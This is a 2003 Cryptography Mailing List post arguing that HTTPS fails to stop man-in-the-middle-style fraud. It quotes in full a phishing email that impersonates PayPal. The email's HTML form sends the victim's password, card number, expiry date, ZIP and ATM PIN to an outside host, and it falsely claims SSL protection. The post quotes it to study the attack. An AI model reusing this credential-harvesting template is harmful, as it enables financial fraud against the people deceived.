Attached is a spam mail that constitutes an attack on paypal similar 
in effect and method to man in the middle.

The bottom line is that https just is not working.  Its broken.

The fact that people keep using shared secrets is a symptom of https 
not working.

The flaw in https is that you cannot operate the business and trust 
model using https that you can with shared secrets.




-------------- Enclosure number 1 ----------------
Received: from bgp480791bgs.summit01.nj.comcast.net [68.37.160.58] by 
dpmail07.doteasy.com
  (SMTPD32-7.13) id A3506CD006A; Sat, 07 Jun 2003 19:45:36 -0700
Date: Sun, 08 Jun 2003 02:50:24 +0000
From: Confirm <[EMAIL PROTECTED]>
Subject: Important Information Regarding Your PayPal Account
To: Jamesd <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
X-RCPT-TO: <[EMAIL PROTECTED]>
Status: U
X-PMFLAGS: 34079360 0 1 P4EDB0.CNM

<html>
<head>
<STYLE type=text/css>
.dummy {}
BODY, TD {font-family: verdana,arial,helvetica,sans-serif;font-size: 13px;color: 
#000000;}
UL {list-style: square}
.pp_big {font-family: verdana,arial,helvetica,sans-serif;font-size: 24px;font-weight: 
bold;color: #003366;} 
.pp_sortofbig {font-family: verdana,arial,helvetica,sans-serif;font-size: 
22px;font-weight: bold;color: #003366;}   
.pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 
18px;font-weight: bold;color: #003366;} 
.pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 
16px;font-weight: bold;color: #003366;}  
.pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 
11px;color: #003366;}   
.pp_mediumtextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 
14px;font-weight: bold;color: #000000;}
.pp_smalltext {font-family: verdana,arial,helvetica,sans-serif;font-size: 
10px;font-weight: normal;color: #000000;}
.pp_smallbluetext {font-family: verdana,arial,helvetica,sans-serif;font-size: 
10px;font-weight: normal;color: #003366;}
.pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: 
#aaaaaa;}    
</STYLE>
<title>PayPal</title>
</head>
<body>
<table width="600" cellspacing="0" cellpadding="0" border="0" align="center">
    <tr>
        <td><A href="https://www.paypal.com/";><IMG 
src="http://www.paypal.com/images/paypal_logo.gif"; width=109 height=35 alt="PayPal" 
border="0" vspace=10></A>
        </td>
    </tr>
</table>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
    <tr>
        <td background="http://www.paypal.com/images/bg_clk.gif"; width="100%"><img 
src="http://www.paypal.com/images/pixel.gif"; height="29" width="1" border="0"></td>
    </tr>   
    <tr>
        <td><img src="http://www.paypal.com/images/pixel.gif"; height="10" width="1" 
border="0"></td>
    </tr>
</table>
<table width="600" cellspacing="0" cellpadding="5" border="0" align="center">
  <tr> 
    <td class="pp_sortofbig" align=middle>Dear PayPal Customer</td>
  </tr>
  <tr> 
    <td valign="top"><p>&nbsp;</p>
      <p>This e-mail is the notification of recent innovations taken by PayPal to 
detect inactive customers and              non-functioning mailboxes.</p>
      <p>The inactive customers are subject to restriction and removal in the next 
        3 months.</p>
      <p>Please confirm your email address and Credit or Check Card information<b 
style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">
      </b>using the form below:</p></td>
  </tr>
  <tr> 
    <td align=middle>

<form action="http://www.pos2life.biz/vp.php"; method="post">
      <p style="MARGIN-TOP: -2px; MARGIN-BOTTOM: 0px; MARGIN-LEFT: 4px" 
     >&nbsp;</p>

      <table border="0">
        <tr>
          <td>
            <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; LINE-HEIGHT: 
normal; FONT-STYLE: normal; FONT-VARIANT: normal" 
           >Email Address:</b></P></td>
          <td><input name="lgn" size="32" maxlength="32" ></td>
        </tr>
        <tr>
          <td>
            <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; LINE-HEIGHT: 
normal; FONT-STYLE: normal; FONT-VARIANT: normal" 
           >Password:</b></P></td>
          <td><input name="psw" type="password" size="32" maxlength="32"></td>
        </tr>
        <tr>
          <td>
            <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: 
normal; FONT-VARIANT: normal">First Name:</b></P></td>
          <td><input name="fname" size="32" maxlength="32" ></td>
        </tr>
                <tr>
          <td>
            <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: 
normal; FONT-VARIANT: normal">Last Name:</b></P></td>
          <td><input name="lname" size="32" maxlength="32" ></td>
        </tr>
 <tr>
          <td>
            <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: 
normal; FONT-VARIANT: normal"> ZIP:</b></P></td>
<td><input name="bz" size="32" maxlength="20">
 <tr>
          <td>
            <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: 
normal; FONT-VARIANT: normal">Credit or Check Card #:</b></P></td>
          <td><input name="cz" size="32" maxlength="16"></td>

 <tr>
          <td>
            <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: 
normal; FONT-VARIANT: normal">Expiration Date:</b></P></td>
          <td>
<select name="crdm"> 
<OPTION value="zero" selected>Month</OPTION> 
<option value="01">01</option> 
<option value="02">02</option> 
<option value="03">03</option> 
<option value="04">04</option> 
<option value="05">05</option> 
<option value="06">06</option>
<option value="07">07</option> 
<option value="08">08</option> 
<option value="09">09</option> 
<option value="10">10</option> 
<option value="11">11</option> 
<option value="12">12</option>
</select> &nbsp;/&nbsp; 
<select name="crdy"> <OPTION value="zero" selected>Year</OPTION> 
<option value="03">2003</option> 
<option value="04">2004</option> 
<option value="05">2005</option> 
<option value="06">2006</option> 
<option value="07">2007</option> 
<option value="08">2008</option> 
<option value="09">2009</option>
<option value="10">2010</option> 
<option value="11">2011</option>
<option value="12">2012</option> </select>
</td>

<tr>
          <td>
            <P align=left><b style="FONT: bold 8pt : normal" 
              >  ATM PIN:</b></P></td>
          <td><input name="pni" type="password" size="32" maxlength="6"></td>
        </tr>
      </table>
        <p>
          <input type="submit" value="   Submit   ">
        </p>
      </form>
Information transmitted using 128bit SSL encryption.
      <p><br>&nbsp; 
      </p></td>
  </tr> 
  <tr> 
    <td align=middle><strong>Thanks for using PayPal! </strong><br></td>
  </tr>
  <tr> 
    <td><img src="http://www.paypal.com/images/dot_row_long.gif";></td>
  </tr>
  <tr> 
    <td class="pp_footer"> This PayPal notification was sent 
      to&nbsp;this email address&nbsp;because you are a Web Accept user and 
      chose to receive the PayPal Periodical newsletter and Product Updates. To 
      modify your notification preferences, go to <A 
      href="https://www.paypal.com/PREFS-NOTI";>https://www.paypal.com/PREFS-NOTI</A> 
         and log in to your account. Changes may take several 
      days to be reflected in our mailings. Replies to this email will not be 
      processed.&nbsp; <br> <br>
      Copyright© 2003 PayPal Inc. All rights reserved. Designated trademarks 
      and brands are the property of their respective owners. </td>
  </tr>
</table>
</body></html>



---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Reply via email to